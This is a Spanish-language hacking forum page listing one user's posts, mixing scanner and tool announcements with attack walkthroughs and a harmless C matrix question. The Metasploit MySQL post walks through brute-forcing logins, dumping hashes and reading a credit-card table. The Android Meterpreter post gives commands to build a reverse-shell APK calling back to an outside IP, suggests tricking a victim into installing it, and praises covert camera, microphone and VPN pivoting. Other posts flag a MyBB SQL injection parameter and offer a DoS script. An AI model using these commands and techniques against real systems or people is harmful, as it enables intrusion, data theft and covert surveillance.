Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Temas - ZanGetsu

#81
Bugs y Exploits / N-Stalker - Web Security Scanner
Marzo 29, 2014, 02:49:17 PM

Hi chicos, navegando por la wavsep 2014, me encontre con este scan de vulnerabilidades muy novedoso, puede detectar vulnes como sql injection, Xss, entre otros, y ademas trae la opcion de OWASP Policy, para detectar vulnes segun Owasp, les dejo una imagen, para descarga el scan deben registrarse en su website:

No tienes permitido ver enlaces. Registrate o Entra a tu cuenta




Saludos !
#82
Bugs y Exploits / Atacando Mysql con Metasploit
Marzo 05, 2014, 08:44:59 PM
MySQL es una de las bases de datos más utilizadas que está siendo utilizado por muchas aplicaciones en No tienes permitido ver enlaces. Registrate o Entra a tu cuenta en un trabajo de pruebas de penetración es casi imposible no encontrar un sistema que va a ejecutar un No tienes permitido ver enlaces. Registrate o Entra a tu cuenta MySQL este artículo vamos a ver cómo podemos atacar una base de datos MySQL con la ayuda del marco de Metasploit.

Digamos que está en el ámbito de nuestra prueba de penetración es un primer paso MySQL server.The es descubrir la versión del Marco database.Metasploit tiene un módulo que nos permite encontrar la versión del database.Knowing la versión de la base de datos nos ayudará a descubrir vulnerabilidades adicionales.


Módulo Metasploit para MySQL versión enumeración

Lo único que tenemos que hacer es insertar la dirección IP remota y ejecutarlo con la orden de marcha.


Ahora podemos usar la mysql_login módulo en combinación con nuestras listas de palabras con el fin de descubrir al menos una cuenta de base de datos válido que nos permitirá iniciar sesión en el No tienes permitido ver enlaces. Registrate o Entra a tu cuenta MySQL es siempre una buena práctica como pruebas de penetración para comprobar la base de datos de credenciales débiles .


El escáner fue un éxito y ahora como podemos ver en los resultados que tenemos dos cuentas válidas ( invitados y de raíz ) para connection.Both remota de estas cuentas no tienen un conjunto de contraseñas.


Antes de usar estas cuentas con el fin de conectarse e interactuar directamente con la base de datos que podemos usar otros dos módulos de Metasploit que nos pueden ayudar para enumerar las cuentas de base de datos y para volcar los nombres de usuario y hashes de contraseñas del curso MySQL server.Of esto se puede hacer manualmente, pero Metasploit nos ayuda a automatizar este No tienes permitido ver enlaces. Registrate o Entra a tu cuenta primero vamos a configurar el módulo mysql_enum con el fin de encontrar información sobre las accouts base de datos:



Podemos ver una muestra de la salida en la siguiente imagen:


Siguiente es el momento de configurar y ejecutar el mysql_hashdump módulo con el fin de volcar los hashes de las contraseñas de todas las cuentas de base de datos:


Ahora podemos usar cualquier cliente mysql para conectarse a la database.Backtrack ha ya un cliente para que podamos usar el comando mysql-h IP-u usuario-p contraseña . En nuestro caso, nuestro IP del destino es 172.16.212.133 y lo haremos utilizar como nombre de usuario de la raíz que se ha descubierto desde el mysql_login módulo before.We se le solicitará una contraseña, pero vamos a dejarlo en blanco ya que la contraseña para la raíz cuenta está en blanco.


Ahora que estamos conectados a la base de datos, podemos utilizar el comando show databases; con el fin de descubrir las bases de datos que se almacenan en el servidor MySQL.



Como siguiente paso es elegir una base de datos y luego tratar de ver las tablas que contiene, a fin de iniciar el extracto data.We puede hacer eso con el comando <dbname> utilización y el comando show tables;


Podemos ver que hay una mesa user.We quisiera extraer los datos de esa tabla, ya que contiene los nombres de usuario y contraseñas de la system.we pueden lograr que con el comando de selección de usuario, contraseña de usuario;


Como podemos ver hay 3 cuentas con No tienes permitido ver enlaces. Registrate o Entra a tu cuenta blanco ahora tenemos todas las cuentas de la database.We MySQL ahora podemos descubrir mesas adicionales de otras bases de datos con el comando show tables de <dbname>;


La tabla interesante aquí es los credit_cards lo que nos gustaría poder ver el contenido de este table.We cambiarán la base de datos con el comando uso <dbname> y vamos a ejecutar el comando espectáculo * de credit_cards;


Ahora tenemos todos los detalles de tarjetas de crédito de los usuarios y todas las cuentas y contraseñas de la base de datos.

Fuente: No tienes permitido ver enlaces. Registrate o Entra a tu cuenta

Les dejo un video con algo parecido :


#83

El creador del video es: M0rph

Me parecio bueno compartirlo Big Grin , saludos !
#84
Cursos, manuales y libros / Hashcat Manual en Español
Febrero 08, 2014, 04:26:17 PM
1.1 VISTA GENERAL ........................................................... 5
1.2 OPCIONES ................................................................ 7
1.3 VECTORES DE ATAQUE ...................................................... 15
1.4 EJEMPLOS ................................................................ 16
1.5 ESPECIFICOS HASHCAT ..................................................... 25
2.1 OCLHASHCAT-PLUS(CUDAHASHCAT-PLUS) ....................................... 25
2.1 OPCIONES ................................................................ 27
2.2 VECTORES DE ATAQUE ...................................................... 34
2.3 RULE-BASED ATTACK ....................................................... 35
2.4 EJEMPLOS ................................................................ 39
2.5 HASHCAT UTILS ........................................................... 48
2.6 SOLUCION DE PROBLEMAS ................................................... 50
2.7 REFERENCIAS ............................................................. 50
2.8 MEJORAS ................................................................. 50

Descarga: No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
#85
Python / GetSploits - search exploit-db.com database
Febrero 08, 2014, 04:23:23 PM
Este script busca exploits. documentos, shell codes, directamente de No tienes permitido ver enlaces. Registrate o Entra a tu cuenta

Código: python
#!/usr/bin/env python

#Name: getsploits.py
#Version: 0.9.2
#Author: s3my0n

#########################################################################
# getsploits searches for specific exploits/shellcode/papers from       #
# exploit-db.com .                                                      #
#                                                                       #
# Copyright (C) 2011 s3my0n                                             #
#                                                                       #
# This program is free software: you can redistribute it and/or modify  #
# it under the terms of the GNU General Public License as published by  #
# the Free Software Foundation, either version 3 of the License, or     #
# any later version.                                                    #
#                                                                       #
# This program is distributed in the hope that it will be useful,       #
# but WITHOUT ANY WARRANTY; without even the implied warranty of        #
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the         #
# GNU General Public License for more details.                          #
#                                                                       #
# You should have received a copy of the GNU General Public License     #
# along with this program.  If not, see <http://www.gnu.org/licenses/>. #
#########################################################################

import sys
import urllib2
import re
import threading
from optparse import OptionParser

class ExploitSearcher(threading.Thread):
    def __init__(self, search_url):
        threading.Thread.__init__(self)
        self.search_url = search_url
        self.results = {}
        self.error = False
       
        exp = ('<a  href="http://www.exploit-db\.com/exploits/\d+">\s*.+\s*</a>',
               'http://www.exploit-db.com/exploits/\d+')
        pap = ('<a  href="http://www.exploit-db\.com/papers/\d+">\s*.+\s*</a>',
               'http://www.exploit-db.com/papers/\d+')
        pdf = ('<a  href="http://www.exploit-db\.com/download_pdf/\d+">.+\s*</a>',
               'http://www.exploit-db.com/download_pdf/\d+')
       
        self.match_string = '%s|%s|%s' % (exp[0], pap[0], pdf[0])
        self.match_links = '%s|%s|%s' % (exp[1], pap[1], pdf[1])
       
    def getPage(self):
        try:
            self.current_page = urllib2.urlopen(self.search_url, '80').read()
        except BaseException:
            self.error = '\n[-] Error: could not connect to exploit-db.com'
    def getResultsFromPage(self, papers=False):
       
        try:
            found_results = re.findall(self.match_string, self.current_page)
        except AttributeError:
            exit(1)
           
        for i in found_results:

            name = ''.join(re.findall('>\s*.+\s*<', i))\
                    .strip('></a\n\r').replace('&lt;', '<')\
                    .replace('&gt;', '>').replace('&amp;', '&')\
                    .replace('&quot;', '"')

            link = ''.join(re.findall(self.match_links, i))
            self.results[name] = link
   
    def run(self):
        self.getPage()
        self.getResultsFromPage()
       
class SearcherController(object):
    def __init__(self, searchopts, genopts):
        def setfromdic(opt, dic):
            # Return number of a platform/type
            if (opt in dic.values()) or (opt == ''):
                return opt
            elif dic.has_key(opt):
                return dic[opt]
            else:
                return None
               
        allplatforms = {'sco':            '34', 'bsdi/x86':      '6',
                        'openbsd':        '27', 'lin/amd64':     '17',
                        'plan9':          '32', 'bsd/x86':       '5',
                        'openbsd/x86':    '28', 'hardware':      '12',
                        'bsd':            '3',  'unix':          '41',
                        'lin/x86-64':     '22', 'netbsd/x86':    '25',
                        'linux':          '16', 'solaris':       '36',
                        'ultrix':         '40', 'arm':           '46',
                        'php':            '31', 'solaris/sparc': '37',
                        'osX':            '30', 'os-x/ppc':      '29',
                        'cfm':            '47', 'generator':     '11',
                        'freebsd/x86':    '9',  'bsd/ppc':       '4',
                        'minix':          '23', 'unixware':      '42',
                        'freebsd/x86-64': '10', 'cgi':           '7',
                        'hp-ux':          '13', 'multiple':      '24',
                        'win64':          '44', 'tru64':         '39',
                        'jsp':            '15', 'novell':        '26',
                        'linux/mips':     '18', 'solaris/x86':   '38',
                        'aix':            '1',  'windows':       '45',
                        'linux/ppc':      '19', 'irix':          '14',
                        'QNX':            '33', 'lin/x86':       '21',
                        'win32':          '43', 'linux/sparc':   '20',
                        'freebsd':        '8',  'asp':           '2',
                        'any':            '0',  'sco/x86':       '35'}

        alltypes = {'any':       '0',
                    'local':     '2',
                    'papers':    '5',
                    'remote':    '3',
                    'shellcode': '4',
                    'webapps':   '6'}

        # Search options
        self.description = searchopts['DESC'].replace(' ', '+')
        self.author = searchopts['AUTH']
        self.port = searchopts['PORT']
        self.osvdb = searchopts['OSVDB']
        self.cve = searchopts['CVE']

        # Setting up platform
        self.platform = setfromdic(searchopts['PLAT'], allplatforms)
        if self.platform == None:
            print '\n[-] Error: invalid platform [%s]' % (searchopts['PLAT'])
            exit(1)

        # Setting up type
        self.type = setfromdic(searchopts['TYPE'], alltypes)
        if self.type == None:
            print '\n[-] Error: invalid type [%s]' % (searchopts['TYPE'])
            exit(1)

        # General options
        self.quiet = genopts['QUIET']
        self.output = genopts['OUTPUT']
       
        self.page = 1 # First page
        self.pages = 1 # How many pages
        self.results = {}

        self.createURL()

    def createURL(self):
        self.search_url = 'http://exploit-db.com/search/?action=search'
        self.search_url += '&filter_page=%d' % (self.page)
        self.search_url += '&filter_description=%s' % (self.description)
        self.search_url += '&filter_author=%s' % (self.author)
        self.search_url += '&filter_platform=%s' % (self.platform)
        self.search_url += '&filter_type=%s' % (self.type)
        self.search_url += '&filter_port=%s' % (self.port)
        self.search_url += '&filter_osvdb=%s' % (self.osvdb)
        self.search_url += '&filter_cve=%s' % (self.cve)

    def userOutput(self, what):
        outputs = {'How_many_pages':'\n[*] Found %d pages of results.' % (self.pages),
                   'No_results':'\n[*] "%s" was not found in the database.' % (self.description),
                   'First_connection':'\n[*] Connecting ...',
                   'Find_results':'\n[*] Searching found pages ...',
                   'Saving_links':'\n[*] Saving found results to %s'%(self.output)}
        return outputs[what]
   
    def findPageNumbers(self):
        if self.quiet != True:
            print self.userOutput('First_connection')

        exploits = '<a\s+href="http://www.exploit-db\.com/exploits/\d+">\s*.+\s*</a>'
        papers = '<a\s+href="http://www.exploit-db\.com/papers/\d+">\s*.+\s*</a>'
        pdf = '<a\s+href="http://www.exploit-db\.com/download_pdf/\d+">\s*.+\s*</a>'
       
        match_highest = 'filter_page=\d+'
       
        try:
            openpage = urllib2.urlopen(self.search_url, '80').read()
        except KeyboardInterrupt:
            print '\n[*] Aborted: exiting'
            exit(1)
        except BaseException:
            print '\n[-] Error: could not connect to exploit-db.com'
            exit(1)
        else:
            find_link = ''.join(re.findall(match_highest, openpage))
            if find_link != '':
                self.pages = max([int(i) for i in re.findall('\d+', find_link)])
            else:
                one_page_test = re.findall('%s|%s|%s'%(exploits, papers, pdf), openpage)
                if one_page_test == []:
                    print self.userOutput('No_results')
                    exit(0)
                   
        if self.quiet != True:
            print self.userOutput('How_many_pages')

    def printResults(self, results):
        for i in results:
            print '\n[+] %s' % (i)
            print '    %s' % (results[i])

    def saveLinks(self):
        if self.quiet != True:
            print self.userOutput('Saving_links')
        try:
            fopen = open(self.output, 'a')
            for i in self.results:
                fopen.write('\n%s\n%s\n'%(i, self.results[i]))
        except KeyboardInterrupt:
            print '\n[*] Aborted: exiting'
            exit(1)
        except IOError:
            print '\n[-] Error: cannot write to %s' % (self.output)
            exit(1)
        else:
            fopen.close()
           
class ArgCreator(object):
    def __init__(self):
        parser = OptionParser(add_help_option=False)
        parser.add_option('--author', dest='author', default='')
        parser.add_option('--platform', dest='platform', default='0')
        parser.add_option('--type', dest='type', default='0')
        parser.add_option('--port', dest='port', default='')
        parser.add_option('--osvdb', dest='osvdb', default='')
        parser.add_option('--cve', dest='cve', default='')
        parser.add_option('-o', dest='output', default='')
        parser.add_option('-q', action='store_true', dest='quiet', default=False)
        parser.add_option('-h', '--help', action='store_true', dest='help', default=False)
        (self.options, args) = parser.parse_args()

        self.checkArgs() # Parsing arguments

    def helpscreen(self):
        return '''
  getsploits v0.9.2
  s3my0n RuSH4ck3R[at]gmail[dot]com


  Usage: getsploits.py [OPTIONS] [SEARCH_OPTIONS] description

  Example: getsploits.py -o linux_shellcode.txt --type shellcode --platform linux ""
           getsploits.py -o freebsd_x86-64_local.txt --platform 10 --type 2 ""
           getsploits.py --author maxe vbulletin

  [Options]:
  -o: Write results to a file
  -q: Quiet mode
  -h: Show this help screen

  [Search Options]:
  --author:
  --platform
  --type
  --port
  --osvdb
  --cve

  [Platforms]:
    0: any (default)    12: hardware       24: multiple      36: solaris
    1: aix              13: hp-ux          25: netbsd/x86    37: solaris/sparc
    2: asp              14: irix           26: novell        38: solaris/x86
    3: bsd              15: jsp            27: openbsd       39: tru64
    4: bsd/ppc          16: linux          28: openbsd/x86   40: ultrix
    5: bsd/x86          17: linux/amd64    29: os-x/ppc      41: unix
    6: bsdi/x86         18: linux/mips     30: osx           42: unixware
    7: cgi              19: linux/ppc      31: php           43: win32
    8: freebsd          20: linux/sparc    32: plan9         44: win64
    9: freebsd/x86      21: linux/x86      33: qnx           45: windows
   10: freebsd/x86-64   22: linux/x86-64   34: sco           46: arm
   11: generator        23: minix          35: sco/x86       47: cfm
                           
  [Types]:
    0: any (default)
    2: local
    5: papers
    3: remote
    4: shellcode
    6: webapps'''

    def checkArgs(self):
        def finddesc():
            args = sys.argv[:]
            search_options = ('--author', '--platform', '--type', '--port', '--osvdb', '--cve')
            lone_options = ('-h', '-q')
            arg_options = ('-o',)
            for i in args:
                if args.index(i) == 0:
                    continue
                previous_i = args[args.index(i)-1]
                if (i in search_options) or (i in lone_options) or (i in arg_options):
                    continue
                else:
                    if previous_i in search_options:
                        continue
                    if previous_i in arg_options:
                        continue
                    elif previous_i in lone_options:
                        return i
                    else:
                        return i
            else:
                return None
               
        if (self.options.help == True) or (len(sys.argv) < 2):
            print self.helpscreen()
            exit(0)
        self.description = finddesc() # Description string
        if self.description == None:
            print '[-] Error: please enter exploit description or enter "" instead of description.'
            exit(1)
           
    def search_options(self):
        return {'DESC':self.description,
                'AUTH':self.options.author,
                'PLAT':self.options.platform,
                'TYPE':self.options.type,
                'PORT':self.options.port,
                'OSVDB':self.options.osvdb,
                'CVE':self.options.cve}
    def general_options(self):
        return {'OUTPUT':self.options.output,
                'QUIET':self.options.quiet}

def main():
    ac = ArgCreator()
    search_options = ac.search_options()
    general_options = ac.general_options()

    sc = SearcherController(search_options, general_options)
    sc.findPageNumbers() # Find out how many pages there are

    # Searching
    threads = []
    for i in xrange(1, sc.pages+1):
        sc.page = i # Changing page number
        sc.createURL() # Update search url with current page number
        t = ExploitSearcher(sc.search_url)
        threads.append(t)
    nthreads = len(threads)
    if sc.quiet != True:
        print sc.userOutput('Find_results')
   
    # Running threads
    try:
        for i in xrange(nthreads):
            threads[i].start()
        for i in xrange(nthreads):
            threads[i].join()
            # Getting thread's results
            error = threads[i].error
            if error:
                print error
                exit(1)
            else:
                new_results = threads[i].results
                sc.results.update(new_results)
                if sc.quiet != True:
                    sc.printResults(new_results)
    except KeyboardInterrupt:
        print '[*] Aborted: exiting'
        exit(1)
    else:
        # Saving links
        if sc.output != '':
            sc.saveLinks()
   
if __name__=='__main__':
    main()


#Author: s3my0n
#86
Bugs y Exploits / Nuevo Meterpreter para Android
Enero 22, 2014, 03:54:02 PM
Hace ya una buena temporada que venía haciendo un "marcaje de cerca" a ESTE "Pull Request" que existía en el GitHub sobre una iniciativa para portar el Meterpreter Java para Android, que aunque pueda parecer trivial porque las aplicaciones de Android se programan en Java, no es exactamente portable el Java "habitual" que el Java para la máquina virtual Dalvik que tenemos en nuestros Android.

Durante este tiempo he ido bajándome el fork de Metasploit de timwr, que ha sido una de las personas que más han contribuido en esta nueva versión del Meterpreter, y la verdad es que lleva tiempo siendo bastante estable, salvo algún error que me encontré que tuve que arreglar desempaquetando el APK, modificando alguna cosa y volviéndolo a empaquetar para su uso.

Finalmente, después de mucha espera, hoy mismo he visto que se ha hecho un commit de esta funcinalidad hace unos pocos días, por lo que en teoría ya tenéis la funcionalidad en el fork principal de Metasploit. Vamos a ver si es verdad:

$ ./msfupdate

  • Attempting to update the Metasploit Framework...

  • [...]
    create mode 100644 external/source/javapayload/androidpayload/library/src/androidpayload/stage/Meterpreter.java
    create mode 100644 external/source/javapayload/androidpayload/library/src/androidpayload/stage/Shell.java
    create mode 100644 external/source/javapayload/androidpayload/library/src/androidpayload/stage/Stage.java
    create mode 100644 external/source/javapayload/androidpayload/library/src/com/metasploit/meterpreter/AndroidMeterpreter.java
    create mode 100644 external/source/javapayload/androidpayload/library/src/com/metasploit/meterpreter/android/stdapi_fs_file_expand_path_android.java
    create mode 100644 external/source/javapayload/androidpayload/library/src/com/metasploit/meterpreter/android/stdapi_sys_process_get_processes_android.java[/b]

    La cosa pinta bien ¿no? Sí que parece que hay ficheros que nos hacen pensar que la funcionalidad del nuevo Meterpreter para Android ha sido incorporada. Vamos a ver la ayuda de msfpayload, a ver si confirma nuestra teoría:

    $ ./msfpayload -l | grep -i android
    android/meterpreter/reverse_tcp Connect back stager, Run a meterpreter server on Android
    android/shell/reverse_tcp Connect back stager, Spawn a piped command shell (sh)


    ¡Genial! Parece que se acabó eso de tener que instalar dos forks de Metasploit, uno el estandar y el otro con esta funcionalidad. Vamos a generar un APK con un Meterpreter con reverse shell, a ver si conseguimos que alguien se lo instale y jugamos un poco con él Smile

    $ ./msfpayload android/meterpreter/reverse_tcp LHOST=11.22.33.44 R > meter.apk

    Tenemos que decirle a msfpayload que use la salida RAW. Eso en otros payloads nos sacaría el shellcode sin formato, pero en el caso de Android nos saca el APK. Veámoslo:

    $ file meter.apk
    meter.apk: Zip archive data, at least v2.0 to extract


    Nos dice que es un ZIP, pero es que en realidad un fichero APK no es más que un ZIP que contiene una serie de ficheros con un formato determinado. Ahora solo tenemos que instalar la aplicación en un Android, generalmente con algún tipo de engaño. Este APK es más bien una prueba de concepto, porque viene con un icono azul de Metasploit, pero podría esconderse el mismo código en una aplicación que "diera el pego" y el efecto sería el mismo. Al arrancar la aplicación se recibe la conexión inversa.

    $ ./msfcli multi/handler PAYLOAD=android/meterpreter/reverse_tcp LHOST=0.0.0.0 E


    Ya hemos comprobado que el Meterpreter para Android, funcionar funciona, pero lo que no sabemos es que funcionalidades tiene. Evidentemente, como sucede en las versiones Java y Linux, la funcionalidad es mucho más reducida que en la versión para Windows, pero aún así hay funcionalidades muy interesantes que nos pueden servir para ilustrar los riesgos de seguridad de un dispositivo móvil. Por ejemplo, viene con funcionalidad para realizar fotografías empleando tanto la cámara delantera como la trasera, si estuviera disponible. Otra funcionalidad que me pareció extremadamente interesante fue la posibilidad de activar el micrófono y usar el terminal como un micro oculto. Esta no conseguí hacerla funcionar en el teléfono que lo probé, pero supongo que poco a poco irán puliendo estos detalles.


    Imagínatelo, comprometer un terminal móvil y poder escuchar y ver por donde va el usuario. Sin duda un gran trabajo de la gente que ha contribuido con este módulo y de la gente de Rapid7 al ayudar a su integración en Metasploit.

    Otra de las funcionalidades que pueden impresionar menos a nivel mediático, pero que resultan muy peligroso a nivel corporativo, es la posibilidad de hacer port-relaying desde el terminal móvil. Digo que interesa a nivel corporativo porque, a un usuario "de casa", no se saca nada haciendo un port-relay, pero en una empresa... ¿qué ocurre si hacemos esto cuando el usuario tiene levantada la VPN que le da acceso a la red interna de la empresa?

    meterpreter> portfwd add -l 80 -r 192.168.100.10 -p 80
    • Local TCP relay created: 0.0.0.0:80 <-> 192.168.100.10:80
      [/b]
      Lo dicho, un gran trabajo de la colaboración de la comunidad y del equipo de desarrollo de Metasploit que seguro que nos va a dar mucho juego.

      Fuete: No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
#87
GoSquared es una empresa que ofrece monitoreo total de nuestra web, tiene planes muy buenos y entre sus cualidades encontramos:

+ Consola en tiempo real de GoSquared le permite ver lo que está ocurriendo en el sitio Web de un solo vistazo.
+ Ver lo que es popular en su sitio ahora.
+ Ver dónde vienen sus visitantes y si están participando con su contenido.
+ Monitorear el impacto y la eficacia de las campañas en tiempo real.
+ Recibir alertas detalladas cuando los niveles de tráfico en el sitio están fuera de lo común.
+ Reaccionar a la actividad del visitante en su sitio antes de que la oportunidad ha pasado.


Pueden disfrutar de su version trial : No tienes permitido ver enlaces. Registrate o Entra a tu cuenta

O tambien acceder a un demo online, donde se ven algunas de sus cualidades : No tienes permitido ver enlaces. Registrate o Entra a tu cuenta

Les dejo ademas un video:



Saludos !
#88

Features:

Dork Search
Dorks Included
Custom Dork Search
Live Website Injection Viewer
Live Url Injection Viewer
Live Vulnerability Found Counter
Mass SQLi ((i)Injection) Scanner
Mass XSS Injection Scanner
Mass /etc/passwd Injection Scanner
Single SQLi Scanner
Single XSS Scanner
Single /etc/passwd Scanner
SQLi - Commands, Examples
XSS - Commands, Examples
/etc/passwd - Commands, Examples
Send to SQLi, XSS, etc/passwd Scanner
Save SQLi, XSS, etc/passwd Vulnerabilities
Clear SQLi, XSS, etc/passwd Vulnerabilities
Add, Remove Dork - Dorklist
Decode and Encode Functions Text(ASCii) to:
Text to Base64 - Base64 to Text De-Encode
Text to Binary - Binary to Text De-Encode
Text to Hex - Hex to Text De-Encode
Decimal to Octal - Octal to Decimal

No tienes permitido ver enlaces. Registrate o Entra a tu cuenta

No tienes permitido ver enlaces. Registrate o Entra a tu cuenta

Saludos !
#89
Bugs y Exploits / Faraday - Penetration Test IDE
Diciembre 20, 2013, 03:11:48 AM

Faraday introduce un nuevo concepto (IPE) Integrado Penetración-Entorno de prueba de un IDE Ensayo de penetración multiusuario. Diseñado para su distribución, la indexación y el análisis de los datos generados durante el proceso de una auditoría de seguridad. El objetivo principal de Faraday es volver a utilizar las herramientas disponibles en la comunidad para aprovecharse de ellos de una manera multiusuario.

Características:

* 40 Plugins (Metasploit, AMAP, Arachini, Dnsenum, Medusa, Nmap, Nessus, w3af, Zap y más)!
* Soporte conjunto
* Información Resaltado
* Filtrado de Conocimiento
* Información Dashboard
* Detección de conflictos
* Soporte para múltiples espacios de trabajo
* IntelliSense Soporte
* Fácil Plugin para el Desarrollo


Requerimientos :

Python 2.6.x and 2.7.x
- Qt3
- CouchDB >= 1.2.0
- The following python libs:
  - mockito
  - couchdbkit
  - whoosh
  - argparse
  - psycopg2
  - IPy
  - requests



Web oficial: No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
Descarga: No tienes permitido ver enlaces. Registrate o Entra a tu cuenta

Saludos !
#90
Python / SSI-Scan [SSI injection scanner]
Diciembre 12, 2013, 04:19:27 PM

SSI-Scan es una herramienta PoC básico que ayuda a facilitar el descubrimiento de vulnerabilidades de inyección SSI, una vulnerabilidad de inyección de código bastante raro y poco documentadas en el lado del servidor incluye directivas se ejecutan sin una validación adecuada y pueden conducir a un compromiso del sistema o la enumeración de servidores completa.

En este punto, las pruebas de SSI-Scan para la inyección mediante el envío de una petición POST encapsulado con una carga útil codificada o por medio de las formas inyectables especificados por el usuario con una capacidad de carga del medio ambiente y la búsqueda de coincidencias variables en la fuente de la página.

SSI-Scan requiere BeautifulSoup4 y mechanize.

Uso:

Código: bash
python ssi-scan.py -u http://example.com


Código: bash
python ssi-scan.py -u http://example.com –form_uname username –form_passwd password


Para obtener más información sobre la inyección SSI visite el siguiente enlance: No tienes permitido ver enlaces. Registrate o Entra a tu cuenta

o este otro : No tienes permitido ver enlaces. Registrate o Entra a tu cuenta

SSI-Scan va a recibir más actualizaciones a su funcionalidad.

TNX && Crédito: fnordbg

descargar:

No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
#91
Hola chicos, si alguien me puede ayudar en esto,
tengo el codigo que multiplica 2 matrices de 3 x 3 bueno eso esta todo hecho,
pero ademas al terminar el codigo, quiero agregar algo que diga

Desea multiplicar otro numero?, si es "s" que vuelva a realizar el codigo y si es "n" que salga del programa
les dejo el codigo :

Código: c
#include <stdio.h>
#include <stdlib.h>

int main()
{
    int numa[3][3];
    int numb[3][3];
    int multi[3][3];
    int a,b;
    for(a=0;a<3;a++){
        for(b=0;b<3;b++){
             printf("Ingrese un valor para la primera matriz, fila %d columna %d: ",a+1,b+1);
    scanf("%d",&numa[a][b]);
       }
    }
         printf("\n");
        printf("\n");
                     printf("Primera Matriz ingresada\n");
                        printf("\n");
         for(a=0;a<3;a++){
        for(b=0;b<3;b++){
        printf("\t%d",numa[a][b]);
}   printf("\n");
}   printf("\n");
    printf("\n");
    for(a=0;a<3;a++){
        for(b=0;b<3;b++){
            printf("Ingrese un valor para la segunda matriz, fila %d columna %d: ",a+1,b+1);
    scanf("%d",&numb[a][b]);
        }
    }
     printf("\n");
        printf("\n");
        printf("Segunda Matriz ingresada:\n");
                        printf("\n");
         for(a=0;a<3;a++){
        for(b=0;b<3;b++){
        printf("\t%d",numb[a][b]);
}   printf("\n");
}   printf("\n");
    printf("\n");
    printf("Resultado Multiplicacion de 2 Matrices:\n");
                        printf("\n");
     for(a=0;a<3;a++){
        for(b=0;b<3;b++){
                            multi[a][b]=numa[a][b]*numb[a][b];
        printf("\t%d",multi[a][b]);
}   printf("\n");
}   printf("\n");
    printf("\n");
    getch();
}


De ante mano, muchas gracias !
#92
Bugs y Exploits / Albaloo Web vulnerability Scanner
Diciembre 01, 2013, 03:11:14 AM

Descarga: No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
#93
Seguridad web y en servidores / Incapsula Protection
Noviembre 26, 2013, 02:11:55 AM

Hola, en lo siguiente veremos un servicio llamado Incapsula, el cual nos ofrece seguridad web, protección contra ataques DDoS, balanceo de carga ente otras cosas. En lo personal yo lo he utilizado y me parece mucho mas eficiente que Cloudflare, tiene un WAF muy bueno, el cual lo
podemos observar en el siguiente Video:


Les dejare un par de capturas de todas las areas que abarca incapsula, algunas como
Antiddos avanzado son de pago (al igual que en cloudflare)
pero en incapsula tienes la posibilidad de probar durante 7 dias
cualquier plan de los disponibles
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta











Pagina Web: No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
#94
Perl / 115 Script en Perl
Noviembre 22, 2013, 12:27:31 AM
Hola chicos les paso a dejar 115 scripts en perl, dedicados a la seguridad e inseguridad informatica (scan, bruteforce, otros...), su uso lo pueden ver con

perl No tienes permitido ver enlaces. Registrate o Entra a tu cuenta


Descarga:

No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
#95
Bugs y Exploits / MyBB editpost.php SQL Injection
Noviembre 22, 2013, 12:20:33 AM
MyBB <1.6.9 es vulnerable al almacenado, Error base, Inyección SQL.

Código Vulnerable:

/ editpost.php

===
Line 398
===
$posthash_query = "posthash='{$posthash}' OR ";
===

Se puede hacer mediante el uso de datos de sabotaje (o Live HTTP Headers), y cuando
presentar un mensaje, edite el parámetro de la POST "posthash 'a su carga útil,
presentar, a continuación, va a editar el post.

fotos aquí







#96
Hola chicos, bueno en la migracion de una web me encontre con un problema, el cual era que no podia subir la base de datos ya que era muy pesada (por phpmyadmin), intente editar el php.ini, y extender el ancho para subir BD pero no surgio efecto, buscando encontre esta herramienta simple en php,

No tienes permitido ver enlaces. Registrate o Entra a tu cuenta

Esta en fase beta pero funciona muy bien,

Una vez descargado el php, lo abrimos con algun editor y nos vamos a las siguientes lineas:

" // Database configuration

$db_server = 'localhost';
$db_name = '';
$db_username = '';
$db_password = ''; "


En donde configuraremos nuestra base de datos, nombre, user y password y por supuesto en entorno local, una vez hecho esto, abriremos en nuestro navegador el php, y tambien debemos subir la DB al servidor web, por ftp u otro medio, una vez hecho abrimos el php y detecta automaticamente las extensiones sql, .sql, .gzip u otras, y solo le damos en instalar y seguira el proceso y buala, todo listo y subido Big Grin

Les dejo una imagen de la tool, no detecta ninguna bd porque no tengo ninguna xD


un Saludo !
#97
Hola chicos les paso a traer este Dos en python,

Descarga en python : No tienes permitido ver enlaces. Registrate o Entra a tu cuenta

Descarga para windows: No tienes permitido ver enlaces. Registrate o Entra a tu cuenta

Requisitos: Python 2.7

#98
Seguridad Wireless / AIO Wireless Hack Tools 2010
Noviembre 21, 2013, 10:32:38 PM


• WiresHark
• AirSnare
• WirelessKeyView
• Wifi Monster
• NetStumbler
• Easy Wifi Radar
• SmartSniff
• Ettercap
• WinPcap
• CommView
• Nmap
• Wirelessmon
• PocketWarrior
• Inssider
• RemoteAnyWhere
• PmoniPacketMon
• ApTools
• WiFiFoFum
• Advanced Port Scanner
• NetSurveyor

Descarga: No tienes permitido ver enlaces. Registrate o Entra a tu cuenta?

Fuente : No tienes permitido ver enlaces. Registrate o Entra a tu cuenta

Saludos !
#99
Hola, bueno en el siguiente post voy a compartir una experiencia que tuve hace un día mas o menos, y fue en un website que administro cuando recibí un fuerte Ddos, bueno de primera me puse a mirar logs, netstat en el Vps y mirando incapsula, donde podia
apreciar el ddos que se me estaba realizando, mirando los logs vi algo muy particular y era que todo el ddos estaba dirigido a un solo archivo php, de primera pense que era simple casualidad o al azar, pero me puse a investigar...

Archivo xmlrpc:




Claramente vemos el ddos a ese archivo en donde yo cuento con Wordpress para el blog del website,

Siguiendo con la averiguacion me encontre con lo siguiente:

Bueno este archivo es utilizado para Pingback, que permite a cualquier persona iniciar una petición de WordPress a un sitio arbitrario. La funcionalidad se debe utilizar para generar referencias cruzadas entre los blogs, pero puede fácilmente ser utilizado para una sola máquina para originar millones de peticiones de múltiples ubicaciones

Veamos el siguiente la siguiente imagen:


Podemos apreciar como funciona este ataque...

